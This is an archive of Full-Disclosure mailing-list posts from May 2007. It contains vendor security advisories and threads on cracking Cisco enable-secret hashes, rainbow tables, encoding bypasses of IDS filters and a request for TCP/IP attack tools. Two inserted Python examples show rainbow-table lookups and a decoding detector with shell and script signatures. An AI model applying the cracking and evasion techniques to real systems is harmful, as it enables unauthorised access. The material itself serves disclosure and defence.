[Full-disclosure] [ MDKSA-2007:104-1 ] - Updated samba packages fix multiple vulnerabilities

2007-05-23 Thread security


 ___
 
 Mandriva Linux Security Advisory   MDKSA-2007:104-1
 http://www.mandriva.com/security/
 ___
 
 Package : samba
 Date: May 23, 2007
 Affected: 2007.0, 2007.1
 ___
 
 Problem Description:
 
 A number of bugs were discovered in the NDR parsing support in Samba
 that is used to decode MS-RPC requests.  A remote attacker could
 send a carefully crafted request that would cause a heap overflow,
 possibly leading to the ability to execute arbitrary code on the server
 (CVE-2007-2446).
 
 A remote authenticated user could trigger a flaw where unescaped
 user input parameters were being passed as arguments to /bin/sh
 (CVE-2007-2447).
 
 Finally, on Samba 3.0.23d and higher, when Samba translated SID to/from
 name using the Samba local list of user and group accounts, a logic
 error in smbd's internal security stack could result in a transition
 to the root user id rather than the non-root user (CVE-2007-2444).

 Update:

 The fix for CVE-2007-2444 broke the behaviour of force group when
 the forced group is a local Unix group for domain member servers.
 
 This update corrects that regression.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2444
 ___
 
 Updated Packages:
 

Re: [Full-disclosure] TCP/IP vulnerability

2007-05-23 Thread Andrew Farmer
On 23 May 07, at 08:27, Mohit Kohli wrote:
> Thanks for the reply but have some concerns...
> 1) Teardrop and LAND attack work on a Win 95 server; how to exploit
> this vulnerability or its variant on Windows 2000 or Linux?

I don't know about Windows 2000, but Linux doesn't appear to have  
ever been affected by LAND, and Teardrop was protected against with  
2.0.32. Getting a kernel that old to run will be very difficult  
unless you've got a copy of some *really* old distribution handy.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] TCP/IP vulnerability

2007-05-23 Thread Mohit Kohli

Ivan

Thanks for the reply but have some concerns...
1) Teardrop and LAND attack work on a Win 95 server; how to exploit this
vulnerability or its variant on Windows 2000 or Linux?

Do we have any other vulnerability in TCP/IP apart from those listed below...


Cheers,

Mohit 
-Original Message-
From: Ivan . [mailto:[EMAIL PROTECTED]
Sent: Wed 5/23/2007 5:34 AM
To: Mohit Kohli
Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]; 
[EMAIL PROTECTED]
Subject: Re: [Full-disclosure] TCP/IP vulnerability
 
dude, check out Fernando Gont site

http://www.gont.com.ar/tools/icmp-attacks/index.html

cheers
Ivan

On 5/22/07, Mohit Kohli <[EMAIL PROTECTED]> wrote:
>
> Hi Guys,
>
> I got an assignment to write a white paper on TCP/IP and to show a demo on
> how to exploit the same.
>
> I have listed some of the vulnerabilities, but need some good tools
> (preferably Windows based) to exploit the vulnerability and to perform
> further analysis.
>
> overlapping IP fragments
> Tear Drop
> Land
> SYN Attack
> Ping Flooding
> IP Spoofing
> SYN Guessing
> Smurf Attack
> Source Routing
> TCP Hijacking
> Man-in-the-Middle Attack
>
> I will appreciate it if you could provide me some inputs with regards to
> tools to exploit the vulnerability.
>
> Cheers
>
> Mohit





[Full-disclosure] rPSA-2007-0108-1 freetype

2007-05-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0108-1
Published: 2007-05-23
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-5.2-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754
https://issues.rpath.com/browse/RPL-1390

Description:
Previous versions of the freetype package are vulnerable to an integer
overflow condition when processing malformed TTF fonts, possibly leading
to a heap overflow and executing arbitrary, attacker-provided code.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



[Full-disclosure] rPSA-2007-0107-1 mysql mysql-bench mysql-server

2007-05-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0107-1
Published: 2007-05-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local User Deterministic Denial of Service
Updated Versions:
mysql=/[EMAIL PROTECTED]:devel//1/5.0.41-2-0.1
mysql-bench=/[EMAIL PROTECTED]:devel//1/5.0.41-2-0.1
mysql-server=/[EMAIL PROTECTED]:devel//1/5.0.41-2-0.1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2583
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1420
https://issues.rpath.com/browse/RPL-1127
https://issues.rpath.com/browse/RPL-1356

Description:
Previous versions of the mysql package are vulnerable to two
authenticated-user denial of service attacks in which specially crafted
queries can be used to crash the server.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



[Full-disclosure] Secunia Research: eScan Products Agent Service Command Decryption Buffer Overflow

2007-05-23 Thread Secunia Research
== 

 Secunia Research 23/05/2007

 - eScan Products Agent Service Command Decryption Buffer Overflow -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* eScan 9.0.715.1

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System compromise
Denial of Service
Where:  Local network

== 
3) Vendor's Description of Software 

"eScan is the latest offering from MicroWorld Technologies Inc. It
offers a combination of features to help you fight the threat of
viruses, set security policies for parental control over content
accessed by your child. It guards against Internet misuse, block Spam
and offensive mails and block PopUp Ads."

Product Link:
http://www.mwti.net/products/escan/escan.asp

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in various eScan
products, which may be exploited by malicious people to compromise a
vulnerable system.

The vulnerability is caused due to a boundary error in the MicroWorld
Agent service (MWAGENT.EXE) when decrypting received commands. This can
be exploited to cause a stack-based buffer overflow via an overly long
command sent to the service (default port /tcp).

Successful exploitation may allow execution of arbitrary code with
SYSTEM privileges.

== 
5) Solution 

Update to version 9.0.718.1 or later.

== 
6) Time Table 

10/05/2007 - Vendor notified.
10/05/2007 - Vendor response.
16/05/2007 - Vendor provides fixed version.
23/05/2007 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2007-2687 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-54/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





Re: [Full-disclosure] Cisco CallManager 4.1 Input ValidationVulnerability

2007-05-23 Thread Mark-David McLaughlin (marmclau)

Hi Stefan,

In their advisory below, Marc and Stefan illustrate how to bypass the web
application firewall used in Cisco CallManager. This means of bypass can be
used to display graphics, scripts, or other information downloaded from an
external web site. This technique may also be used to conduct cross-site
scripting attacks. Cisco confirms that the example the authors provided
bypasses the web application firewall and that there may be other methods
for bypassing the web application firewall.

Cisco has made improvements to the input validation mechanisms in
CallManager that may mitigate the risks associated with this security
vulnerability. These improvements have been incorporated into 4.2(3)sr2.
Future releases, 3.3(5)sr3, 4.1(3)sr5 and 4.3(1)sr1, will also include the
improvements made to address this bug. This issue is being tracked by the
following Cisco Bug ID:

  * CSCsi12374 - Improvements in User Input Validation

Service releases of CallManager software are available at the following
link:

http://www.cisco.com/public/sw-center/sw-voice.shtml

Additional Information
==

Cisco CallManager is the software-based call-processing component of the
Cisco IP telephony solution that extends enterprise telephony features and
functions to packet telephony network devices, such as IP phones, media
processing devices, voice-over-IP (VoIP) gateways, and multimedia
applications. The vulnerability described in this response exists in the
web application firewall used in CallManager. This feature is designed to
prevent users from entering malicious code into the input fields used in
CallManager forms. The vulnerability exists because the web application
firewall fails to properly sanitize some potentially malicious tags.

To exploit these issues an attacker must convince an authenticated user to
follow a specially crafted, malicious URL. A successful attack may result
in the execution of arbitrary script code in the user's web browser.

For additional information on cross-site scripting (XSS) attacks and the
methods used to exploit such vulnerabilities, please refer to the Cisco
Applied Intelligence Response "Understanding Cross-Site Scripting (XSS)
Threat Vectors," which is available at the following link:

http://www.cisco.com/en/US/products/ps6120/tsd_products_security_response09186a008073f7b3.html

The Cisco PSIRT is not aware of any malicious use of the vulnerability
described in this document.

We would like to thank Marc Ruef and Stefan Friedli for bringing this issue
to our attention and for working with us toward coordinated disclosure of
the issue. We greatly appreciate the opportunity to work with researchers
on security vulnerabilities, and welcome the opportunity to review and
assist in product reports.

Cheers,

Mark-David McLaughlin
Product Security Incident Response Team (PSIRT) Cisco Systems, Inc.

- - -Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Stefan
Friedli
Sent: Wednesday, May 23, 2007 10:11 AM
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [Full-disclosure] Cisco CallManager 4.1 Input
ValidationVulnerability

Cisco CallManager 4.1 Input Validation Vulnerability

scip AG Vulnerability ID 2977 (03/13/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2977

I. INTRODUCTION

Cisco CallManager, short CCM, is a professional voice-over-IP solution
that tracks active components, including among others phones, gateways,
conference bridges, transcoding resources and voicemail boxes.

II. DESCRIPTION

Marc Ruef and Stefan Friedli found a web-based vulnerability that was
identified in Cisco CallManager 4.1 and may affect earlier versions as
well.

The web interface of the application fails to properly sanitize data
supplied by the search form before displaying it back to the user.
Though several filters are in place to prevent the injection of 

[Full-disclosure] [ MDKSA-2007:109 ] - Updated tetex packages fix vulnerabilities

2007-05-23 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:109
 http://www.mandriva.com/security/
 ___
 
 Package : tetex
 Date: May 23, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Buffer overflow in the gdImageStringFTEx function in gdft.c in the
 GD Graphics Library 2.0.33 and earlier allows remote attackers to
 cause a denial of service (application crash) and possibly execute
 arbitrary code via a crafted string with a JIS encoded font.
 
 Tetex 3.x uses an embedded copy of the gd source and may also be
 affected by this issue (CVE-2007-0455).
 
 A buffer overflow in the open_sty function for makeindex in Tetex
 could allow user-assisted remote attackers to overwrite files and
 possibly execute arbitrary code via a long filename (CVE-2007-0650).
 
 The updated packages have been patched to prevent these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0455
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0650
 ___
 
 Updated Packages:
 

[Full-disclosure] FLEA-2007-0020-1: freetype

2007-05-23 Thread Foresight Linux Essential Announcement Service

Foresight Linux Essential Advisory: 2007-0020-1
Published: 2007-05-21

Rating: Moderate

Updated Versions:

freetype=/[EMAIL PROTECTED]:devel//1//[EMAIL PROTECTED]:1-devel//1/2.3.4-0.0.1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.2-0.9-2

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754
https://issues.rpath.com/browse/RPL-1390

Description:
Previous versions of the freetype package were vulnerable to an issue
whereby a specially crafted TTF file could execute arbitrary code at the
permission level of the user running freetype.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html



[Full-disclosure] Rainbow tables and Oracle SYSTEM salt

2007-05-23 Thread coderman
speaking of bad salts, i haven't seen any tables for oracle SYSTEM
user.  i know at one point the "lack of fix" was deterring some from
release, but that was two years ago.  perhaps oracle needs a stronger
incentive.

rumors of patches / table generators abound; are people just keeping
these private?

full disclosure++



Re: [Full-disclosure] Enable secret 5 : Cisco Password

2007-05-23 Thread coderman
On 5/23/07, coderman <[EMAIL PROTECTED]> wrote:
> ... for example, lanman is a great target
> - it uses md5, but does not salt.

er, this should be MD4 or DES, depending on version.  mea culpa...



Re: [Full-disclosure] Enable secret 5 : Cisco Password

2007-05-23 Thread coderman
On 5/23/07, Michael Holstein <[EMAIL PROTECTED]> wrote:
> > Dork, show me a full set of a-zA-Z0-9{8} rainbow tables with salted
> > md5 and I will show you a picture of me in a bathing suit.
>
> My *point* was that a rainbow attack against is a lot faster than a
> brute-force with JTR or similar. Might as well try the easier options first.

what Knud was indicating is that rainbow tables work against unsalted
(or minimally salted) targets.  for example, lanman is a great target
- it uses md5, but does not salt.  if you have 200G to spare, this
works great.

properly salted md5 is immune to rainbow table attacks.

(now, as for generating collisions, there have been some nice advances
in md5 tunneling attacks, but the cost is still too large for targeted
md5 collisions iirc.  someone will correct me if i'm wrong, i'm
sure...)

best regards,

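Added example, not from the thread or any poster, illustrating coderman's point above: a table precomputed from unsalted MD5 reverses a captured hash directly, while a per-hash salt makes the same table miss and forces any work to start only after the salt is known. The candidate list, the salt and the simplified salt-prepend hash are constructed stand-ins, not md5-crypt or Cisco's type 5 algorithm.

```python
import hashlib
from typing import Dict, Iterable, Optional, Tuple

# Constructed stand-in for the a-zA-Z0-9{8} keyspace the thread mentions;
# a real table would enumerate billions of candidates, not five.
CANDIDATES = ["password", "letmein1", "Cisco123", "enable05", "r0ut3rpw"]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def build_table(candidates: Iterable[str], salt: bytes = b"") -> Dict[str, str]:
    """Precompute digest -> candidate for one fixed salt (empty = unsalted).

    This dict is the conceptual content of a rainbow table: a real table
    stores hash chains instead of every pair, but answers the same query.
    The precomputation is done once and amortised over every captured hash
    that used the same (here: no) salt.
    """
    return {md5_hex(salt + c.encode()): c for c in candidates}


def lookup(table: Dict[str, str], digest: str) -> Optional[str]:
    """Reverse a captured digest with a precomputed table; None on a miss."""
    return table.get(digest)


def hash_password(password: str, salt: bytes = b"") -> str:
    """Simplified salted hash: salt prepended before MD5, in the spirit of
    md5-crypt's $1$salt$... layout. md5-crypt itself runs many more rounds;
    this is a constructed simplification, not Cisco's type 5 algorithm.
    """
    return md5_hex(salt + password.encode())


def tables_needed(salt_bits: int) -> int:
    """A table is only valid for the salt it was built with, so covering a
    salt space needs one table per salt value: 2**salt_bits tables."""
    return 2 ** salt_bits


def demo() -> Tuple[Optional[str], Optional[str], Optional[str]]:
    """Returns (unsalted hit, salted miss, hit after a per-salt rebuild)."""
    precomputed = build_table(CANDIDATES)       # built before any hash is seen

    unsalted = hash_password("Cisco123")
    hit = lookup(precomputed, unsalted)         # "Cisco123": the table pays off

    salt = b"k3Qz"                              # constructed 4-character salt
    salted = hash_password("Cisco123", salt)
    miss = lookup(precomputed, salted)          # None: same password, no match

    # Only once the salt is captured can a matching table be built, so the
    # precomputation advantage is gone: the work starts per hash, not up front.
    rebuilt = build_table(CANDIDATES, salt)
    late_hit = lookup(rebuilt, salted)
    return hit, miss, late_hit


if __name__ == "__main__":
    print(demo())
    # A 4-character salt drawn from a 64-symbol alphabet is 24 bits of salt.
    print(tables_needed(24), "tables needed to cover that salt space")
```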


[Full-disclosure] [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs player (fwd)

2007-05-23 Thread Jay Sulzberger


-- Forwarded message --
  Date: Wed, 23 May 2007 15:32:47 -0500
  From: Aaron Hackney <[EMAIL PROTECTED]>
  Reply-To: [EMAIL PROTECTED]
  To: [EMAIL PROTECTED]
  Subject: [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs
  player

  As many of you may or not know, the Spurs are a big deal here in San
  Antonio. (GO SPURS GO!)
  Anyhow, one of the stars of the Spurs is suing a local computer shop
  for $2 mil.

  http://www.thesmokinggun.com/archive/years/2007/0501071bowen1.html

  From what I understand.
  They used an off the shelf hard drive to ghost his PC, install a new
  drive and then ghost the image back to the pc. They then accidentally
  sold that hard disk in a pc to some lady. She notices there is stuff
  already on the disk. Opens up my documents and there is a TON of
  personal info on this millionaire nba star

  From what I understand, it's bad karma coming back to haunt this
  company. Everyone on a different list-serv that I am on has nothing but
  bad things to say about them, including former employees :P




Re: [Full-disclosure] Enable secret 5 : Cisco Password

2007-05-23 Thread Michael Holstein
> Dork, show me a full set of a-zA-Z0-9{8} rainbow tables with salted
> md5 and I will show you a picture of me in a bathing suit.

My *point* was that a rainbow attack against is a lot faster than a 
brute-force with JTR or similar. Might as well try the easier options first.

Of course, if the router is "in hand" it's even easier still to reboot 
it into ROMmon and reset the config register, but that's not what the OP 
asked.

~Mike.



Re: [Full-disclosure] Enable secret 5 : Cisco Password

2007-05-23 Thread Knud Erik Højgaard
WOW, another unknowing CISSP (is this available via some e-school?) ,
and GCIA as well, I am baffled!!

Dork, show me a full set of a-zA-Z0-9{8} rainbow tables with salted
md5 and I will show you a picture of me in a bathing suit.


> I'd suggest checking against one of the many public rainbow tables first
> though. Remember, with a hash, you need not figure out the actual
> password, just something that generates a collision.
>
> Cheers,
>
> Michael Holstein CISSP GCIA
> Cleveland State University <- student obviously.



Re: [Full-disclosure] Enable secret 5 : Cisco Password

2007-05-23 Thread Michael Holstein
> Since it's an MD5 password, you would need quite a bit of processing 
> power, maybe put the hash up on milw0rm?

Well, that depends on how long/complex the password is. Using djohn and 
several CPUs would increase efficiency substantially.

I'd suggest checking against one of the many public rainbow tables first 
though. Remember, with a hash, you need not figure out the actual 
password, just something that generates a collision.

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University



[Full-disclosure] iDefense Security Advisory 05.23.07: Opera Software Opera Web Browser Transfer Item Pop-up Menu Stack Overflow Vulnerability

2007-05-23 Thread iDefense Labs
Opera Software Opera Web Browser Transfer Item Pop-up Menu Stack
Overflow Vulnerability

iDefense Security Advisory 05.23.07
http://labs.idefense.com/intelligence/vulnerabilities/
May 23, 2007

I. BACKGROUND

Opera is a cross-platform web browser. More information is available at
http://www.opera.com/

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow in Opera Software
ASA's Opera Web browser could allow an attacker to execute arbitrary
code on the affected host.

Opera 9.2 supports BitTorrent downloads. If a server sends the browser a
specially crafted BitTorrent header, it can lead to a buffer overflow.
The buffer overflow is triggered when the user right clicks on the item
in the download pane.

III. ANALYSIS

Exploitation of this vulnerability allows an attacker to execute
arbitrary code on the affected host.

The attacker must convince the vulnerable user into clicking a link to a
BitTorrent file.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the Opera
version 9.2 for Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is not currently aware of a work around for this issue.

VI. VENDOR RESPONSE

Version 9.21 of Opera has been released to address this issue. More
information can be found at the following URL.

http://www.opera.com/support/search/view/860/

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

05/08/2007  Initial vendor notification
05/08/2007  Initial vendor response
05/23/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by enhalos.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Enable secret 5 : Cisco Password

2007-05-23 Thread Chris Cochrane
Since it's an MD5 password, you would need quite a bit of processing power, 
maybe put the hash up on milw0rm? 
 
Chris



> From: [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk
> Date: Tue, 22 May 2007 16:06:12 -0600
> Subject: [Full-disclosure] Enable secret 5 : Cisco Password
>
> Anyone have any tools to crack a cisco secret 5 password? I know cain will
> crack a 7 password...
>
> If you would please respond off list I would be appreciative.
>
> any help out there?
>
> -Jeff Wilder
> CISSP,CCE,C/EH

[Full-disclosure] Cisco CallManager 4.1 Input Validation Vulnerability

2007-05-23 Thread Stefan Friedli
Cisco CallManager 4.1 Input Validation Vulnerability

scip AG Vulnerability ID 2977 (03/13/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2977

I. INTRODUCTION

Cisco CallManager (CCM for short) is a professional voice-over-IP solution
that tracks active components, including, among others, phones, gateways,
conference bridges, transcoding resources and voicemail boxes.

II. DESCRIPTION

Marc Ruef and Stefan Friedli identified a web-based vulnerability in Cisco
CallManager 4.1; earlier versions may be affected as well.

The web interface of the application fails to properly sanitize data
supplied through the search form before displaying it back to the user.
Though several filters are in place to prevent the injection of 

Re: [Full-disclosure] [WEB SECURITY] noise about full-width encoding bypass?

2007-05-23 Thread Amit Klein
Arian J. Evans wrote:
>
> On 5/22/07, *Amit Klein* <[EMAIL PROTECTED]> wrote:
>
>
> Fair enough. Still, I expect at least the websecurity mailing list to
> give credit where credit is due...
>
>
> Hmm, good point, No argument, but...as we see more of this
> character encoding set awareness I wonder:
>
> 1. Where do you draw the line on what is "new"?
>

The way I see it, and I think it addresses the rest of your points (in 
your original email) is that the researcher should attempt to find the 
most similar/relevant prior art, and then discuss how (if at all...) 
his/her findings differ. This provides the public with:
- Acknowledgment (and credit) of prior art
- Explanation of what is "really" new

So if say the web-app-sec researcher applies techniques from the AV 
world to the web-app-sec world, he/she should credit the AV prior-art, 
and explain that those techniques are applied in the paper to the 
web-app-sec world, with the twists X, Y and Z.
Or you can say something like: In this research I combine evasion 
techniques A (credit to...), B (credit to...) and C (credit to...) to 
bypass system X.

By subscribing to this scheme, the author makes it much easier to 
evaluate his/her paper. The author does most of the work (finding prior 
art, comparing their findings to prior art), and the readers judge 
whether this is new enough/interesting.

As for research in non-English languages - that's where *I* draw the 
line. I assume that everyone can (and should) read English nowadays, and 
I do not expect anyone to be aware of non-English prior art. However, if 
such prior art becomes known to the author, it's his/her duty to credit 
the authors of such text, of course.

-Amit




Re: [Full-disclosure] [WEB SECURITY] noise about full-width encoding bypass?

2007-05-23 Thread Arian J. Evans

On 5/22/07, Amit Klein <[EMAIL PROTECTED]> wrote:

> Fair enough. Still, I expect at least the websecurity mailing list to
> give credit where credit is due...



Hmm, good point, no argument, but...as we see more of this
character encoding set awareness I wonder:

1. Where do you draw the line on what is "new"?

2. The Cert advisory is telling us that a lot of folks consider this "new".
(Maybe you should link them back to Scambray and McClure's late 90's
prediction that Unicode would be the death of IDS?)

3. There are two or more completely separate dialogues here, between
network sec, and app sec. A lot of folks deserve credit for related research
on the network side, and probably even the VX side of the house.

If you look at the VX'er history they dealt with many of the same issues
independent of network and appsec, yet we don't credit any of them...
(probably because they largely wrote in Russian and Polish).

4. The reality is that we are going to see stuff like Cert advisories for
things that are (or should be) pretty damn obvious, and redundant, as people
start to understand charsets and encoding types more. Let's say I found a
web-based triple-decode shellcode canonicalization recently: is that a "new vuln"?

Canonicalization order:

Unix Shellcode --> Hex URL --> HTML Hexadecimal Reference --> raw text

Should I publish a Cert advisory on this? I'm pretty sure their IDS
isn't gonna catch it. In fact, I am pretty sure no one's is.

Who do I credit?

Not trying to escape responsibility by any means; I am having
trouble getting my head around the depth of this hole though.

Thanks,

--
Arian Evans
software security stuff

"Diplomacy is the art of saying "Nice doggie" until you can find a rock." --
Will Rogers
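
The triple-decode chain Arian describes (shellcode, then HTML hex references, then URL encoding) is exactly what a signature engine has to unwind before it can match anything, and the full-width forms in this thread's subject are one more layer of the same problem: an IDS that matches on the wire bytes sees none of it. The Python below is an added example, not code from any poster or from the CERT advisory. It decodes to a fixed point (URL, HTML entity and Unicode compatibility normalization per round), flags input that never settles as hostile, and compares a naive byte match with a match on the canonical form. The signature list, the encoders used to build the samples, and the samples themselves are constructed for the example.

```python
import html
import unicodedata
from urllib.parse import unquote

# Constructed signatures for the demonstration; a real engine has thousands.
SIGNATURES = ("/bin/sh", "<script")


def canonicalize(s: str, max_rounds: int = 8) -> str:
    """Undo encoding layers until nothing changes.

    Each round strips one layer of each kind: %xx escapes, &#x..;/&#..;/named
    entities, and Unicode compatibility forms (NFKC folds full-width U+FF0F to '/').
    Nested encodings therefore converge on the bytes a downstream interpreter
    would eventually see. Input still changing after max_rounds is a decode bomb
    or deliberate evasion, so it is rejected rather than passed through.
    """
    for _ in range(max_rounds):
        before = s
        s = unquote(s)                        # "%2F" -> "/", also peels "%252F" one step
        s = html.unescape(s)                  # "&#x2f;", "&#47;", "&sol;" -> "/"
        s = unicodedata.normalize("NFKC", s)  # full-width / half-width / compatibility forms
        if s == before:
            return s
    raise ValueError("input still decoding after %d rounds; treat as hostile" % max_rounds)


def naive_match(s: str) -> bool:
    """What a byte-level signature check sees: the raw request, no decoding."""
    return any(sig in s for sig in SIGNATURES)


def canonical_match(s: str) -> bool:
    """Same signatures, applied after canonicalization."""
    return any(sig in canonicalize(s) for sig in SIGNATURES)


# Encoders used only to build evasion samples (constructed, not captured traffic).
def html_hex_refs(s: str) -> str:
    return "".join("&#x%x;" % ord(c) for c in s)


def url_encode_all(s: str) -> str:
    return "".join("%%%02X" % ord(c) for c in s)


# Arian's chain: raw -> HTML hex references -> URL-encoded on the wire.
TRIPLE = url_encode_all(html_hex_refs("/bin/sh"))
# Full-width forms of the same string (U+FF0F, U+FF42 ...), the thread's subject.
FULLWIDTH = "\uff0f\uff42\uff49\uff4e\uff0f\uff53\uff48"
# Plain double URL encoding, which a single-pass decoder also misses.
DOUBLE_URL = url_encode_all(url_encode_all("/bin/sh"))

if __name__ == "__main__":
    for label, sample in (("triple", TRIPLE), ("fullwidth", FULLWIDTH), ("double-url", DOUBLE_URL)):
        print("%-10s naive=%-5s canonical=%-5s -> %r"
              % (label, naive_match(sample), canonical_match(sample), canonicalize(sample)))
```

The fixed-point loop is the important design choice: decoding a fixed number of times (one, or even three) just moves the bar, because the attacker picks the depth. Bounding the rounds and failing closed is what keeps the loop itself from becoming a CPU sink on crafted input.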

Re: [Full-disclosure] [WEB SECURITY] noise about full-width encoding bypass?

2007-05-23 Thread Amit Klein

>>
>> BTW - why is this news? it has been known for long:
>>
>>
>> I think the problem here is network security folks don't understand 
>> this stuff at all.
>>
>
> Fair enough. Still, I expect at least the websecurity mailing list to 
> give credit where credit is due...
>
Just to clarify - I meant "mailing list" as in "mailing list 
subscribers". I did not mean "mailing list admin". The websecurity 
moderation is conducted solely for generally keeping the discussion on 
topic, and with no attempt (I think) in general to verify the accuracy 
of the materials nor their novelty. And I respect that.

-Amit



Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread kingcope
Hello 3APA3A,

Yes, saw that before; the weird thing is that the
screenshot shows the page at the
wwwroot ("/") displaying the error after running
the script.



Best Regards,


Kingcope


-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, May 23, 2007 12:21 PM
To: kingcope
Cc: 'Full-Disclosure'
Subject: Re[2]: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

Dear kingcope,

With debugging it looks quite harmless:

Server Error in '/' Application.



Directory '\\.\aux' does not exist. Failed to start monitoring file changes.

Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code. 

Exception Details: System.Web.HttpException: Directory '\\.\aux' does not
exist. Failed to start monitoring file changes.

Source Error: 

An unhandled exception was generated during the execution of the current web
request. Information regarding the origin and location of the exception can
be identified using the exception stack trace below.  

Stack Trace: 


[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to
start monitoring file changes.]
   System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean
addIfNotFound, Boolean throwOnError) +527
   System.Web.FileChangesMonitor.StartMonitoringPath(String alias,
FileChangeEventHandler callback) +477
   System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean
isSensitive, String[] filenamesArg, String[] cachekeysArg, CacheDependency
dependency, DateTime utcStart) +1535
   System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[]
filenames, DateTime utcStart) +50
 
System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashta
ble cachedeps, DateTime utcStart) +151
   System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String
reqPath, IHttpMapPath configmap) +760
   System.Web.HttpContext.GetCompleteConfigRecord(String reqpath,
IHttpMapPath configmap) +434
   System.Web.HttpContext.GetCompleteConfig() +49
   System.Web.HttpContext.GetConfig(String name) +195
   System.Web.CustomErrors.GetSettings(HttpContext context, Boolean
canThrow) +20
   System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow)
+39
   System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext
context, Exception e) +486

 




Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET
Version:1.1.4322.2032 

--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to [EMAIL PROTECTED]:

k> Btw,
k> Here is a screenshot of the effect.


k> -Original Message-
